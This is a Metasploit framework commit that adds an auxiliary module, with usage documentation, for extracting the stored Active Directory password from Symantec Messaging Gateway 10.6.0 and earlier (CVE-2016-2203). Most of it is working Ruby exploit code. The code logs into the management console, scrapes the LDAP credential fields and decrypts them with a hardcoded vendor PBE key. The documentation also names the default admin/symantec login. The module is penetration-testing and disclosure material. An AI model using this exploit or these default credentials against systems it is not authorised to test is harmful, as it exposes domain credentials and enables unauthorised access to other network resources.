Land rapid7#6793, Add Symantec Messaging Gateway to extract stored AD pass

wchen-r7 · wchen-r7 · commit db85f2599844 · 2016-06-07T19:40:50.000-05:00
diff --git a/documentation/modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.md b/documentation/modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.md
@@ -0,0 +1,40 @@
+Symantec Messaging Gateway is an all-in-one appliance to secure email with real-time antispam,
+antimalware, targeted attacks, content filtering, data loss, and email encryption.
+
+The management console of SMG can be used to recover the AD password by any user with at least
+read access to the appliance, which could potentially permit leveraging unauthorized, elevated
+access to other resources of the network.
+
+Authentication is required to use symantec_brightmail_ldapcreds. However, it is possible to see
+SMG with using the default username **admin** and **symantec**.
+
+
+## Vulnerable Application
+
+Symantec Messaging Gateway 10.6.0 and earlier are known to be vulnerable.
+
+symantec_brightmail_ldapcreds was specifically tested against 10.6.0 during development.
+
+## Verification Steps
+
+These verification steps assume you already have access to the vulnerable version of
+[Symantec Messaging Gateway](https://www.symantec.com/products/threat-protection/messaging-gateway).
+During the development of symantec_brightmail_ldapcreds, Symantec was still providing 10.6.0 as a trial.
+
+**Installation**
+
+The 10.6.0 installation guide can be found [here](https://symwisedownload.symantec.com//resources/sites/SYMWISE/content/live/DOCUMENTATION/9000/DOC9108/en_US/smg_10.6_installation_guide.pdf?__gda__=1465490103_20360f5503fd3ef6ce426bd541fd2109)
+
+Make sure you remember your username and password for Symantec Messaging Gateway before using
+the module.
+
+**Using the Module**
+
+Once you have the vulnerable setup ready, go ahead and do this:
+
+1. Start msfconsole
+2. Do: ```use auxiliary/scanner/http/symantec_brightmail_ldapcreds```
+3. Do: ```set RHOSTS [IP]```
+4. Do: ```set USERNAME [USERNAME FOR SMG]```
+5. Do: ```set PASSWORD [PASSWORD FOR SMG]```
+6. Do: ```run```
diff --git a/modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb b/modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb
@@ -0,0 +1,314 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'digest'
+require "openssl"
+
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Symantec Messaging Gateway 10 Exposure of Stored AD Password Vulnerability',
+      'Description'    => %q{
+        This module will  grab the AD account saved in Symantec Messaging Gateway and then
+        decipher it using the disclosed Symantec PBE key.  Note that authentication is required
+        in order to successfully grab the LDAP credentials, and you need at least a read account.
+        Version 10.6.0-7 and earlier are affected
+      },
+      'References'     =>
+        [
+          ['URL','https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160418_00'],
+          ['CVE','2016-2203'],
+          ['BID','86137']
+        ],
+      'Author'         =>
+        [
+          'Fakhir Karim Reda <karim.fakhir[at]gmail.com>'
+        ],
+       'DefaultOptions' =>
+        {
+          'SSL' => true,
+          'SSLVersion' => 'TLS1',
+          'RPORT' => 443
+        },
+       'License'        => MSF_LICENSE,
+       'DisclosureDate' => 'Dec 17 2015'
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('USERNAME', [true, 'The username to login as']),
+        OptString.new('PASSWORD', [true, 'The password to login with']),
+        OptString.new('TARGETURI', [true, 'The base path to Symantec Messaging Gateway', '/'])
+      ], self.class)
+
+    deregister_options('RHOST')
+  end
+
+  def print_status(msg='')
+    super(rhost ? "#{peer} - #{msg}" : msg)
+  end
+
+  def print_good(msg='')
+    super("#{peer} - #{msg}")
+  end
+
+  def print_error(msg='')
+    super("#{peer} - #{msg}")
+  end
+
+  def report_cred(opts)
+   service_data = {
+    address: opts[:ip],
+    port: opts[:port],
+    service_name: 'LDAP',
+    protocol: 'tcp',
+    workspace_id: myworkspace_id
+   }
+   credential_data = {
+    origin_type: :service,
+    module_fullname: fullname,
+    username: opts[:user],
+    private_data: opts[:password],
+    private_type: :password
+   }.merge(service_data)
+   login_data = {
+    last_attempted_at: DateTime.now,
+    core: create_credential(credential_data),
+    status: Metasploit::Model::Login::Status::SUCCESSFUL,
+    proof: opts[:proof]
+   }.merge(service_data)
+
+   create_credential_login(login_data)
+  end
+
+  def auth(username, password, sid, last_login)
+    sid2 = ''
+
+    res = send_request_cgi!({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, 'brightmail', 'login.do'),
+      'headers'   => {
+        'Referer' => "https://#{peer}/brightmail/viewLogin.do",
+        'Connection' => 'keep-alive'
+      },
+      'cookie'    => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid}",
+      'vars_post' => {
+        'lastlogin'  => last_login,
+        'userLocale' => '',
+        'lang'       => 'en_US',
+        'username'   => username,
+        'password'   => password,
+        'loginBtn'   => 'Login'
+      }
+    })
+
+   if res &&res.body =~ /Logged in/
+      sid2 = res.get_cookies.scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0]
+      return sid2
+   end
+
+   nil
+  end
+
+  def get_login_data
+    sid        = ''  #From cookie
+    last_login = ''  #A hidden field in the login page
+
+    res = send_request_raw({
+      'uri' => normalize_uri(target_uri.path, 'brightmail', 'viewLogin.do')
+    })
+
+    if res
+      last_login = res.get_hidden_inputs.first['lastlogin'] || ''
+
+      unless res.get_cookies.empty?
+        sid = res.get_cookies.scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0] || ''
+      end
+    end
+
+    return sid, last_login
+  end
+
+
+  # Returns the status of the listening port.
+  #
+  # @return [Boolean] TrueClass if port open, otherwise FalseClass.
+  def port_open?
+    begin
+      res = send_request_raw({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path)
+      })
+
+      return true if res
+    rescue ::Rex::ConnectionRefused
+      print_status("Connection refused")
+    rescue ::Rex::ConnectionError
+      print_error("Connection failed")
+    rescue ::OpenSSL::SSL::SSLError
+      print_error("SSL/TLS connection error")
+    end
+
+    false
+  end
+
+  # Returns the derived key from the password, the salt and the iteration count number.
+  #
+  # @return Array of byte containing the derived key.
+  def get_derived_key(password, salt, count)
+    key = password + salt
+
+    for i in 0..count-1
+        key = Digest::MD5.digest(key)
+    end
+
+    kl = key.length
+
+    return key[0,8], key[8,kl]
+  end
+
+  # Returns the decoded Base64 data in RFC-4648 implementation.
+  # The Rex implementation decoding Base64 is by using unpack("m").
+  # By default, the "m" directive uses RFC-2045, but if followed by 0,
+  # it uses RFC-4648, which is the same RFC Base64.strict_decode64 uses.
+  def strict_decode64(str)
+    "#{Rex::Text.decode_base64(str)}0"
+  end
+
+
+  # @Return the deciphered password
+  # Algorithm obtained by reversing the firmware
+  def decrypt(enc_str)
+    pbe_key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,./<>?;':\"\\{}`~!@#$%^&*()_+-="
+    salt = strict_decode64(enc_str[0,12])
+    remsg = strict_decode64(enc_str[12,enc_str.length])
+    (dk, iv) = get_derived_key(pbe_key, salt, 1000)
+    alg = 'des-cbc'
+
+    decode_cipher = OpenSSL::Cipher::Cipher.new(alg)
+    decode_cipher.decrypt
+    decode_cipher.padding = 0
+    decode_cipher.key = dk
+    decode_cipher.iv = iv
+    plain = decode_cipher.update(remsg)
+    plain << decode_cipher.final
+
+    plain.gsub(/[\x01-\x08]/,'')
+  end
+
+
+  def grab_auths(sid,last_login)
+    token         = '' # from hidden input
+    selected_ldap = '' # from checkbox input
+    new_uri       = '' # redirection
+    flow_id       = '' # id of the flow
+    folder        = '' # symantec folder
+
+    res = send_request_cgi({
+      'method'    => 'GET',
+      'uri'       => normalize_uri(target_uri.path, '/brightmail/setting/ldap/LdapWizardFlow$exec.flo'),
+      'headers'   => {
+        'Referer' => "https://#{peer}/brightmail/setting/ldap/LdapWizardFlow$exec.flo",
+        'Connection' => 'keep-alive'
+      },
+      'cookie'    => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid};"
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out while getting token to authenticate.')
+    end
+
+    token = res.get_hidden_inputs.first['symantec.brightmail.key.TOKEN'] || ''
+
+    res = send_request_cgi({
+      'method'       => 'POST',
+      'uri'          => normalize_uri(target_uri.path, '/brightmail/setting/ldap/LdapWizardFlow$edit.flo'),
+      'cookie'       => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid}; ",
+      'vars_post'    =>
+        {
+          'flowId'     => '0',
+          'userLocale' => '',
+          'lang'       => 'en_US',
+          'symantec.brightmail.key.TOKEN'=> "#{token}"
+        },
+      'headers'      =>
+        {
+          'Referer' => "https://#{peer}/brightmail/setting/ldap/LdapWizardFlow$exec.flo",
+          'Connection' => 'keep-alive'
+        }
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out while attempting to authenticate.')
+    end
+
+    if res.headers['Location']
+      mlocation = res.headers['Location']
+      new_uri = res.headers['Location'].scan(/^https:\/\/[\d\.]+(\/.+)/).flatten[0]
+      flow_id =  new_uri.scan(/.*\?flowId=(.+)/).flatten[0]
+      folder = new_uri.scan(/(.*)\?flowId=.*/).flatten[0]
+    end
+
+    res = send_request_cgi({
+      'method'    => 'GET',
+      'uri'       => "#{folder}",
+      'headers'   => {
+        'Referer' => "https://#{peer}/brightmail/setting/ldap/LdapWizardFlow$exec.flo",
+        'Connection' => 'keep-alive'
+      },
+      'cookie'    => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid}; ",
+      'vars_get'  => {
+      'flowId'  => "#{flow_id}",
+      'userLocale' => '',
+      'lang'       => 'en_US'
+      }
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out while trying to collect credentials.')
+    end
+
+    if res.code == 200
+      login = res.body.scan(/<input type="text" name="userName".*value="(.+)"\/>/).flatten[0] || ''
+      password = res.body.scan(/<input type="password" name="password".*value="(.+)"\/>/).flatten[0] || ''
+      host =  res.body.scan(/<input name="host" id="host" type="text" value="(.+)" class/).flatten[0] || ''
+      port =  res.body.scan(/<input name="port" id="port" type="text" value="(.+)" class/).flatten[0] || ''
+      password = decrypt(password)
+      print_good("Found login = '#{login}' password = '#{password}' host ='#{host}' port = '#{port}' ")
+      report_cred(ip: host, port: port, user:login, password: password, proof: res.code.to_s)
+    end
+  end
+
+  def run_host(ip)
+    unless port_open?
+      print_status("Port is not open.")
+    end
+
+    sid, last_login = get_login_data
+
+    if sid.empty? || last_login.empty?
+      print_error("Missing required login data.  Cannot continue.")
+      return
+    end
+
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+    sid = auth(username, password, sid, last_login)
+
+    if sid
+      print_good("Logged in as '#{username}:#{password}' Sid: '#{sid}' LastLogin '#{last_login}'")
+      grab_auths(sid,last_login)
+    else
+      print_error("Unable to login.  Cannot continue.")
+    end
+  end
+end
